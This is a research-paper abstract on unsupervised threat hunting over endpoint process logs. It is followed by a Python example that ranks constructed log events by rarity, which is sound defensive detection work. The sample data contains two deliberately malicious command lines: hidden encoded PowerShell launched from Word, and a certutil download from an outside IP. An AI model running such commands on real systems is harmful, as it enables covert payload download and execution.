Unsupervised Threat Hunting using Continuous Bag-of-Terms-and-Time (CBoTT)
CoRR(2024)
Abstract
Threat hunting is the practice of sifting through system logs to detect malicious activity that has bypassed existing security controls. It can be performed in several ways, one of which is anomaly detection. We propose an unsupervised framework, called continuous bag-of-terms-and-time (CBoTT), and publish its application programming interface (API) to help researchers and cybersecurity analysts perform anomaly-based threat hunting over SIEM logs, specifically process-auditing logs collected from endpoint devices. Our analyses show that the framework consistently outperforms benchmark approaches. When logs are sorted by their likelihood of being an anomaly (most likely first), our approach places the known anomalies near the top of the ranked list (at percentile positions between 1.82 and 6.46, where a smaller number means closer to the top), whereas the benchmark approaches place the same anomalies further down (between 3.25 and 80.92). This framework can be used by other researchers to conduct benchmark analyses and by cybersecurity analysts to find anomalies in SIEM logs.
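The evaluation protocol in the abstract (score every log line, sort most-anomalous first, report the percentile position at which a known-bad event lands) is easy to reproduce on any unsupervised scorer. The example below is added here for illustration and is not the paper's code or its CBoTT model: it uses a deliberately simple stand-in featurization of my own (a bag of field-qualified terms plus a coarse time-of-day term) scored by corpus-wide term rarity, applied to a constructed, Sysmon-style sample of process-audit events. Field names, the user names, the hostless log format and the two injected suspicious events are all assumptions made for this example.

```python
"""Rarity-based ranking of process-audit events plus the percentile evaluation
described in the abstract. The featurization (bag of terms + time bucket) and the
scoring rule are an illustrative stand-in chosen for this example, NOT the paper's
CBoTT model. All log records below are constructed, not real SIEM data."""
import math
import re
from collections import Counter
from datetime import datetime

# Constructed endpoint process-creation events (invented users, hosts omitted).
SAMPLE_LOGS = [
    {"ts": "2024-03-04T09:02:11", "user": "alice", "parent": "explorer.exe", "image": "winword.exe", "cmd": "winword.exe /n report.docx"},
    {"ts": "2024-03-04T09:05:40", "user": "alice", "parent": "explorer.exe", "image": "outlook.exe", "cmd": "outlook.exe"},
    {"ts": "2024-03-04T09:31:03", "user": "bob",   "parent": "explorer.exe", "image": "chrome.exe",  "cmd": "chrome.exe --profile-directory=Default"},
    {"ts": "2024-03-04T10:12:55", "user": "alice", "parent": "explorer.exe", "image": "excel.exe",   "cmd": "excel.exe /e budget.xlsx"},
    {"ts": "2024-03-04T11:45:09", "user": "bob",   "parent": "explorer.exe", "image": "winword.exe", "cmd": "winword.exe /n notes.docx"},
    {"ts": "2024-03-04T13:20:27", "user": "carol", "parent": "explorer.exe", "image": "chrome.exe",  "cmd": "chrome.exe --profile-directory=Default"},
    {"ts": "2024-03-04T14:02:48", "user": "alice", "parent": "explorer.exe", "image": "chrome.exe",  "cmd": "chrome.exe --profile-directory=Default"},
    {"ts": "2024-03-04T15:18:31", "user": "carol", "parent": "explorer.exe", "image": "outlook.exe", "cmd": "outlook.exe"},
    {"ts": "2024-03-04T16:40:12", "user": "bob",   "parent": "explorer.exe", "image": "excel.exe",   "cmd": "excel.exe /e sales.xlsx"},
    {"ts": "2024-03-04T17:05:59", "user": "carol", "parent": "explorer.exe", "image": "winword.exe", "cmd": "winword.exe /n memo.docx"},
    # Two events a hunter would want near the top of the queue (constructed):
    # Office spawning hidden, encoded PowerShell in the evening, and certutil used
    # as a downloader at 03:27 from a cmd.exe parent.
    {"ts": "2024-03-04T22:14:03", "user": "alice", "parent": "winword.exe", "image": "powershell.exe", "cmd": "powershell.exe -nop -w hidden -enc SQBFAFgA"},
    {"ts": "2024-03-05T03:27:44", "user": "bob",   "parent": "cmd.exe",     "image": "certutil.exe",   "cmd": "certutil.exe -urlcache -split -f http://198.51.100.7/a.txt a.txt"},
]
LABELED_ANOMALIES = {10, 11}  # indices into SAMPLE_LOGS; used only for evaluation, never for scoring


def time_term(ts: str) -> str:
    """Coarse time-of-day bucket so that *when* a process ran is part of the bag, not only *what* ran."""
    hour = datetime.fromisoformat(ts).hour
    bucket = "night" if hour < 6 else "day" if hour < 18 else "evening"
    return f"time:{bucket}"


def tokenize(rec: dict) -> list:
    """Bag of field-qualified terms: user, parent, image, command-line tokens, time bucket."""
    terms = [f"user:{rec['user']}", f"parent:{rec['parent']}", f"image:{rec['image']}"]
    for tok in re.split(r"[\s/:=]+", rec["cmd"].lower()):
        if tok:
            terms.append(f"cmd:{tok}")
    terms.append(time_term(rec["ts"]))
    return terms


def document_frequency(records: list) -> Counter:
    """Unsupervised statistic: in how many events each term occurs (no labels involved)."""
    return Counter(t for r in records for t in set(tokenize(r)))


def anomaly_score(rec: dict, df: Counter, n: int) -> float:
    """Mean surprisal of the event's terms under Laplace-smoothed corpus frequencies.
    Terms never seen before (df == 0) get the maximum surprisal, which is what makes
    a novel parent/child pair or a new command-line flag float to the top."""
    terms = set(tokenize(rec))
    return sum(-math.log((df.get(t, 0) + 1) / (n + 2)) for t in terms) / len(terms)


def rank_logs(records: list) -> list:
    """Return (index, score) pairs sorted most-anomalous first: the analyst's triage queue."""
    df = document_frequency(records)
    n = len(records)
    scored = [(i, anomaly_score(r, df, n)) for i, r in enumerate(records)]
    return sorted(scored, key=lambda pair: pair[1], reverse=True)


def anomaly_percentiles(ranked: list, anomaly_indices: set) -> dict:
    """Percentile position of each labelled anomaly in the ranked list.
    Rank 1 of N maps to 100/N, so a smaller percentile means nearer the top."""
    n = len(ranked)
    return {i: 100.0 * pos / n for pos, (i, _) in enumerate(ranked, start=1) if i in anomaly_indices}


if __name__ == "__main__":
    ranked = rank_logs(SAMPLE_LOGS)
    for pos, (i, score) in enumerate(ranked, start=1):
        flag = "  <-- labelled anomaly" if i in LABELED_ANOMALIES else ""
        print(f"{pos:2d}  {score:.3f}  {SAMPLE_LOGS[i]['parent']} -> {SAMPLE_LOGS[i]['cmd']}{flag}")
    print("percentile positions of labelled anomalies:", anomaly_percentiles(ranked, LABELED_ANOMALIES))
```

With this toy scorer both injected events land in the top two of twelve (percentile positions 8.33 and 16.67); the abstract's numbers come from the paper's own model on its own data and are not reproduced here. The point of the harness is that the percentile is the analyst-facing metric: it says how far down the queue a hunter must read before reaching the known-bad event, which is exactly the comparison the abstract draws between CBoTT and its benchmarks. Swap `anomaly_score` for any other unsupervised scorer and `anomaly_percentiles` still gives a like-for-like comparison.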